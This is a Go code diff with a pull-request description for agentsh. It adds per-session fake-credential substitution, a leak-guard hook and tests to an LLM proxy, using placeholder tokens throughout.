 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	_, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger)
+	_, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -518,7 +518,7 @@ func TestStartLLMProxy_MCPOnlyMode(t *testing.T) {
 	storagePath := t.TempDir()
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, storagePath, logger)
+	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, storagePath, logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -604,7 +604,7 @@ func TestStartLLMProxy_MCPConfigPassedThrough(t *testing.T) {
 	}
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger)
+	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -669,7 +669,7 @@ func TestStartLLMProxy_CreatesRegistry(t *testing.T) {
 	}
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger)
+	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -769,7 +769,7 @@ func TestStartLLMProxy_MCPOnlyWithoutPolicy(t *testing.T) {
 			storageCfg := config.DefaultLLMStorageConfig()
 			logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-			proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, tt.mcpCfg, t.TempDir(), logger)
+			proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, tt.mcpCfg, t.TempDir(), logger, nil, nil)
 			if err != nil {
 				t.Fatalf("StartLLMProxy failed: %v", err)
 			}
@@ -836,7 +836,7 @@ func TestStartLLMProxy_NoRegistryWhenPolicyDisabled(t *testing.T) {
 	mcpCfg := config.SandboxMCPConfig{}
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger)
+	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -887,7 +887,7 @@ func TestSession_MCPRegistryClearedOnClose(t *testing.T) {
 	}
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	_, _, err = StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger)
+	_, _, err = StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -1017,7 +1017,7 @@ func TestStartLLMProxy_NetworkServerDeclarations(t *testing.T) {
 	}
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger)
+	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -1097,7 +1097,7 @@ func TestStartLLMProxy_StdioPreRegistrationNoMultiServerCallback(t *testing.T) {
 	}
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger)
+	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}

--- a/internal/session/manager.go
+++ b/internal/session/manager.go
@@ -522,6 +522,9 @@ func (s *Session) LLMProxyURL() string {
 }
 
 // CloseLLMProxy closes the LLM proxy.
+// Stops the proxy first (waiting for in-flight requests to drain),
+// then zeros the credential table. This ordering ensures hooks see
+// a populated table for the duration of any in-flight request.
 func (s *Session) CloseLLMProxy() error {
 	s.mu.Lock()
 	fn := s.llmProxyClose
@@ -533,13 +536,15 @@ func (s *Session) CloseLLMProxy() error {
 	s.credsTable = nil
 	s.secretsClose = nil
 	s.mu.Unlock()
+	// Stop proxy first so in-flight requests finish with a populated table.
+	var proxyErr error
+	if fn != nil {
+		proxyErr = fn()
+	}
 	if secretsFn != nil {
 		secretsFn()
 	}
-	if fn != nil {
-		return fn()
-	}
-	return nil
+	return proxyErr
 }
 
 func (s *Session) SetNetNS(name string, closeFn func() error) {

--- a/internal/session/manager.go
+++ b/internal/session/manager.go
@@ -14,6 +14,7 @@ import (
 
 	"github.com/agentsh/agentsh/internal/pathutil"
 	"github.com/agentsh/agentsh/internal/policy"
+	"github.com/agentsh/agentsh/internal/proxy/credsub"
 	"github.com/agentsh/agentsh/pkg/types"
 	"github.com/google/uuid"
 )
@@ -81,6 +82,13 @@ type Session struct {
 	// Used by seccomp file_monitor and execve handler for accurate path matching.
 	// Falls back to the global policy if nil.
 	policyEngine *policy.Engine
+
+	// credsTable is the per-session credential substitution table.
+	// Nil if no secrets are configured.
+	credsTable *credsub.Table
+
+	// secretsClose zeros the credsTable on session close. Nil if no secrets.
+	secretsClose func()
 }
 
 // SetPolicyEngine stores the session-specific policy engine with expanded variables.
@@ -95,6 +103,23 @@ func (s *Session) PolicyEngine() *policy.Engine {
 	s.mu.Lock()
 	defer s.mu.Unlock()
 	return s.policyEngine
+}
+
+// CredsTable returns the per-session credential substitution table,
+// or nil if no secrets are configured.
+func (s *Session) CredsTable() *credsub.Table {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	return s.credsTable
+}
+
+// SetCredsTable stores the credential table and cleanup function on
+// the session. Called by StartLLMProxy after BootstrapCredentials.
+func (s *Session) SetCredsTable(t *credsub.Table, closeFn func()) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	s.credsTable = t
+	s.secretsClose = closeFn
 }
 
 type Manager struct {
@@ -500,11 +525,17 @@ func (s *Session) LLMProxyURL() string {
 func (s *Session) CloseLLMProxy() error {
 	s.mu.Lock()
 	fn := s.llmProxyClose
+	secretsFn := s.secretsClose
 	s.llmProxyClose = nil
 	s.llmProxyURL = ""
 	s.llmProxy = nil
 	s.mcpRegistry = nil
+	s.credsTable = nil
+	s.secretsClose = nil
 	s.mu.Unlock()
+	if secretsFn != nil {
+		secretsFn()
+	}
 	if fn != nil {
 		return fn()
 	}

--- a/internal/session/secrets.go
+++ b/internal/session/secrets.go
@@ -1,0 +1,88 @@
+package session
+
+import (
+	"context"
+	"fmt"
+	"log/slog"
+
+	"github.com/agentsh/agentsh/internal/proxy/credsub"
+	"github.com/agentsh/agentsh/internal/proxy/secrets"
+)
+
+// ServiceConfig describes one secret-backed service for credential
+// substitution. Plan 5 uses this struct directly; future plans will
+// parse it from YAML policy files.
+type ServiceConfig struct {
+	Name      string            // logical service name (e.g. "github")
+	SecretRef secrets.SecretRef  // where to fetch the real credential
+	FakeFormat string           // fake template (e.g. "ghp_{rand:36}")
+}
+
+// SecretFetcher is the subset of secrets.SecretProvider that
+// BootstrapCredentials needs. Both *secrets.Registry and individual
+// providers satisfy this interface.
+type SecretFetcher interface {
+	Fetch(ctx context.Context, ref secrets.SecretRef) (secrets.SecretValue, error)
+}
+
+// BootstrapCredentials fetches secrets, generates fakes, and populates
+// a credsub.Table. Returns the table and a cleanup function that zeros
+// the table.
+//
+// If any fetch or fake generation fails, all already-fetched secrets
+// are zeroed before returning the error. The agent never starts with
+// a partially populated table.
+func BootstrapCredentials(
+	ctx context.Context,
+	fetcher SecretFetcher,
+	services []ServiceConfig,
+) (*credsub.Table, func(), error) {
+	table := credsub.New()
+
+	for _, svc := range services {
+		sv, err := fetcher.Fetch(ctx, svc.SecretRef)
+		if err != nil {
+			table.Zero()
+			return nil, nil, fmt.Errorf("fetch secret for %q: %w", svc.Name, err)
+		}
+
+		fake, err := secrets.GenerateFake(svc.FakeFormat, len(sv.Value))
+		if err != nil {
+			sv.Zero()
+			table.Zero()
+			return nil, nil, fmt.Errorf("generate fake for %q: %w", svc.Name, err)
+		}
+
+		if addErr := table.Add(svc.Name, fake, sv.Value); addErr != nil {
+			// Collision — retry once.
+			fake2, err2 := secrets.GenerateFake(svc.FakeFormat, len(sv.Value))
+			if err2 != nil {
+				sv.Zero()
+				table.Zero()
+				return nil, nil, fmt.Errorf("regenerate fake for %q: %w", svc.Name, err2)
+			}
+			if addErr2 := table.Add(svc.Name, fake2, sv.Value); addErr2 != nil {
+				sv.Zero()
+				table.Zero()
+				return nil, nil, fmt.Errorf("add entry for %q after retry: %w", svc.Name, addErr2)
+			}
+		}
+
+		// Wipe fetched secret from memory — table has its own copy.
+		sv.Zero()
+	}
+
+	cleanup := func() {
+		table.Zero()
+	}
+
+	return table, cleanup, nil
+}
+
+// LogSecretsInitialized emits the secrets_initialized audit event.
+func LogSecretsInitialized(logger *slog.Logger, sessionID string, serviceCount int) {
+	logger.Info("secrets_initialized",
+		"session_id", sessionID,
+		"service_count", serviceCount,
+	)
+}

--- a/internal/session/secrets_integration_test.go
+++ b/internal/session/secrets_integration_test.go
@@ -1,0 +1,72 @@
+package session
+
+import (
+	"bytes"
+	"context"
+	"testing"
+
+	"github.com/agentsh/agentsh/internal/proxy/secrets"
+)
+
+func TestCredentialPipeline_EndToEnd(t *testing.T) {
+	// Set up a memory provider with a known secret.
+	realSecret := []byte("ghp_realABCDEFGHIJKLMNOPQRSTUVWXYZ123456")
+	mp := &memoryProvider{
+		secrets: map[string][]byte{
+			"github/token": realSecret,
+		},
+	}
+
+	services := []ServiceConfig{
+		{
+			Name:       "github",
+			SecretRef:  secrets.SecretRef{Scheme: "memory", Host: "github", Path: "token"},
+			FakeFormat: "ghp_{rand:36}",
+		},
+	}
+
+	// Bootstrap credentials.
+	table, cleanup, err := BootstrapCredentials(context.Background(), mp, services)
+	if err != nil {
+		t.Fatalf("BootstrapCredentials: %v", err)
+	}
+	defer cleanup()
+
+	// Get the fake that was generated.
+	fake, ok := table.FakeForService("github")
+	if !ok {
+		t.Fatal("no fake for github")
+	}
+
+	// Verify fake->real substitution.
+	reqBody := []byte(`{"token":"` + string(fake) + `"}`)
+	replaced := table.ReplaceFakeToReal(reqBody)
+	wantReq := []byte(`{"token":"` + string(realSecret) + `"}`)
+	if !bytes.Equal(replaced, wantReq) {
+		t.Errorf("ReplaceFakeToReal:\n  got:  %s\n  want: %s", replaced, wantReq)
+	}
+
+	// Verify real->fake scrubbing.
+	respBody := []byte(`{"echoed":"` + string(realSecret) + `"}`)
+	scrubbed := table.ReplaceRealToFake(respBody)
+	wantResp := []byte(`{"echoed":"` + string(fake) + `"}`)
+	if !bytes.Equal(scrubbed, wantResp) {
+		t.Errorf("ReplaceRealToFake:\n  got:  %s\n  want: %s", scrubbed, wantResp)
+	}
+
+	// Verify leak guard detects fake in body.
+	serviceName, found := table.ContainsFake(reqBody)
+	if !found {
+		t.Error("ContainsFake should detect fake in request body")
+	}
+	if serviceName != "github" {
+		t.Errorf("serviceName = %q, want %q", serviceName, "github")
+	}
+
+	// Verify no false positive.
+	cleanBody := []byte(`{"message":"hello world"}`)
+	_, found = table.ContainsFake(cleanBody)
+	if found {
+		t.Error("ContainsFake should not flag clean body")
+	}
+}

--- a/internal/session/secrets_test.go
+++ b/internal/session/secrets_test.go
@@ -1,0 +1,201 @@
+package session
+
+import (
+	"context"
+	"errors"
+	"testing"
+
+	"github.com/agentsh/agentsh/internal/proxy/secrets"
+)
+
+// memoryProvider implements SecretFetcher for testing.
+type memoryProvider struct {
+	secrets map[string][]byte
+}
+
+func (p *memoryProvider) Fetch(_ context.Context, ref secrets.SecretRef) (secrets.SecretValue, error) {
+	key := ref.Host + "/" + ref.Path
+	if ref.Field != "" {
+		key += "#" + ref.Field
+	}
+	val, ok := p.secrets[key]
+	if !ok {
+		return secrets.SecretValue{}, secrets.ErrNotFound
+	}
+	out := make([]byte, len(val))
+	copy(out, val)
+	return secrets.SecretValue{Value: out}, nil
+}
+
+func TestBootstrapCredentials_HappyPath(t *testing.T) {
+	mp := &memoryProvider{
+		secrets: map[string][]byte{
+			// ghp_ (4) + 36 = 40 total
+			"github/token": []byte("ghp_realABCDEFGHIJKLMNOPQRSTUVWXYZ123456"),
+		},
+	}
+
+	services := []ServiceConfig{
+		{
+			Name:       "github",
+			SecretRef:  secrets.SecretRef{Scheme: "memory", Host: "github", Path: "token"},
+			FakeFormat: "ghp_{rand:36}",
+		},
+	}
+
+	table, cleanup, err := BootstrapCredentials(context.Background(), mp, services)
+	if err != nil {
+		t.Fatalf("BootstrapCredentials returned error: %v", err)
+	}
+	defer cleanup()
+
+	if table.Len() != 1 {
+		t.Errorf("table.Len() = %d, want 1", table.Len())
+	}
+
+	fake, ok := table.FakeForService("github")
+	if !ok {
+		t.Fatal("FakeForService(github) not found")
+	}
+	if len(fake) != 40 {
+		t.Errorf("fake length = %d, want 40", len(fake))
+	}
+	if string(fake[:4]) != "ghp_" {
+		t.Errorf("fake prefix = %q, want %q", string(fake[:4]), "ghp_")
+	}
+}
+
+func TestBootstrapCredentials_FetchError_CleansUp(t *testing.T) {
+	mp := &memoryProvider{secrets: map[string][]byte{}}
+
+	services := []ServiceConfig{
+		{
+			Name:       "github",
+			SecretRef:  secrets.SecretRef{Scheme: "memory", Host: "github", Path: "token"},
+			FakeFormat: "ghp_{rand:36}",
+		},
+	}
+
+	table, cleanup, err := BootstrapCredentials(context.Background(), mp, services)
+	if err == nil {
+		t.Fatal("expected error when secret not found")
+	}
+	if table != nil {
+		t.Error("table should be nil on error")
+	}
+	if cleanup != nil {
+		t.Error("cleanup should be nil on error")
+	}
+}
+
+func TestBootstrapCredentials_InvalidFormat_CleansUp(t *testing.T) {
+	mp := &memoryProvider{
+		secrets: map[string][]byte{
+			"github/token": []byte("ghp_realABCDEFGHIJKLMNOPQRSTUVWXYZ1234"),
+		},
+	}
+
+	services := []ServiceConfig{
+		{
+			Name:       "github",
+			SecretRef:  secrets.SecretRef{Scheme: "memory", Host: "github", Path: "token"},
+			FakeFormat: "bad_format_no_placeholder",
+		},
+	}
+
+	_, _, err := BootstrapCredentials(context.Background(), mp, services)
+	if err == nil {
+		t.Fatal("expected error for invalid format")
+	}
+	if !errors.Is(err, secrets.ErrInvalidFakeFormat) {
+		t.Errorf("expected ErrInvalidFakeFormat, got: %v", err)
+	}
+}
+
+func TestBootstrapCredentials_LengthMismatch_CleansUp(t *testing.T) {
+	mp := &memoryProvider{
+		secrets: map[string][]byte{
+			// Real is 42 bytes, but format produces 51 (sk- + 48 = 51)
+			"openai/key": []byte("sk-realABCDEFGHIJKLMNOPQRSTUVWXYZ12345678"),
+		},
+	}
+
+	services := []ServiceConfig{
+		{
+			Name:       "openai",
+			SecretRef:  secrets.SecretRef{Scheme: "memory", Host: "openai", Path: "key"},
+			FakeFormat: "sk-{rand:48}",
+		},
+	}
+
+	_, _, err := BootstrapCredentials(context.Background(), mp, services)
+	if err == nil {
+		t.Fatal("expected error for length mismatch")
+	}
+	if !errors.Is(err, secrets.ErrFakeLengthMismatch) {
+		t.Errorf("expected ErrFakeLengthMismatch, got: %v", err)
+	}
+}
+
+func TestBootstrapCredentials_MultipleServices(t *testing.T) {
+	mp := &memoryProvider{
+		secrets: map[string][]byte{
+			"github/token": []byte("ghp_realABCDEFGHIJKLMNOPQRSTUVWXYZ123456"),
+			"openai/key":   []byte("sk-realXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDE"),
+		},
+	}
+
+	services := []ServiceConfig{
+		{
+			Name:       "github",
+			SecretRef:  secrets.SecretRef{Scheme: "memory", Host: "github", Path: "token"},
+			FakeFormat: "ghp_{rand:36}",
+		},
+		{
+			Name:       "openai",
+			SecretRef:  secrets.SecretRef{Scheme: "memory", Host: "openai", Path: "key"},
+			FakeFormat: "sk-{rand:48}",
+		},
+	}
+
+	table, cleanup, err := BootstrapCredentials(context.Background(), mp, services)
+	if err != nil {
+		t.Fatalf("BootstrapCredentials returned error: %v", err)
+	}
+	defer cleanup()
+
+	if table.Len() != 2 {
+		t.Errorf("table.Len() = %d, want 2", table.Len())
+	}
+}
+
+func TestBootstrapCredentials_Cleanup_ZerosTable(t *testing.T) {
+	mp := &memoryProvider{
+		secrets: map[string][]byte{
+			"github/token": []byte("ghp_realABCDEFGHIJKLMNOPQRSTUVWXYZ123456"),
+		},
+	}
+
+	services := []ServiceConfig{
+		{
+			Name:       "github",
+			SecretRef:  secrets.SecretRef{Scheme: "memory", Host: "github", Path: "token"},
+			FakeFormat: "ghp_{rand:36}",
+		},
+	}
+
+	table, cleanup, err := BootstrapCredentials(context.Background(), mp, services)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if table.Len() != 1 {
+		t.Fatalf("table should have 1 entry before cleanup")
+	}
+
+	cleanup()
+
+	if table.Len() != 0 {
+		t.Errorf("table.Len() = %d after cleanup, want 0", table.Len())
+	}
+}


### PR DESCRIPTION
## Summary

- **Fake credential generator** (`internal/proxy/secrets/fakegen.go`): format-string-driven generation with `{rand:N}` syntax, crypto/rand, base62 alphabet, 24-char minimum entropy enforcement
- **Hook pipeline** (`internal/proxy/hooks.go`, `proxy.go`): `HookAbortError` for typed hook aborts (400-599 only), `hookRegistry` wired into `ServeHTTP` (pre-hook after DLP) and `ModifyResponse` (post-hook after body read)
- **ContainsFake** (`internal/proxy/credsub/table.go`): substring scan returning `(serviceName, bool)` — never exposes real credential bytes
- **CredsSubHook** (`internal/proxy/credshook.go`): fake→real on request, real→fake on response, infallible
- **LeakGuardHook** (`internal/proxy/credshook.go`): scans body, URL query, and all header values (`Header.Values`, not `Header.Get`) for fakes; returns 403 via `HookAbortError`
- **Session bootstrap** (`internal/session/secrets.go`): `BootstrapCredentials` fetches secrets, generates fakes, populates table, returns cleanup fn; zeros table on failure
- **Session wiring** (`internal/session/manager.go`, `llmproxy.go`): `SetLLMProxy`/`SetProxyInstance` deferred until after bootstrap succeeds; `CloseLLMProxy` stops proxy before zeroing table

## Out of scope (future plans)

- SSE streaming substitution
- Cross-service fake credential detection

## Test plan

- [x] `go test ./internal/proxy/secrets/... -v -race` — 17 tests for format parsing, generation, entropy
- [x] `go test ./internal/proxy/... -v -race` — hook abort, plain error, status code validation (table-driven), CredsSubHook, LeakGuardHook (body/query/headers/duplicates)
- [x] `go test ./internal/proxy/credsub/... -v -race` — ContainsFake substring scanning
- [x] `go test ./internal/session/... -v -race` — bootstrap happy path, fetch error cleanup, invalid format, length mismatch, multiple services, integration test (end-to-end substitution + leak detection)
- [x] `GOOS=windows go build ./...` — cross-compilation clean


🤖 Generated with [Claude Code](https://claude.com/claude-code)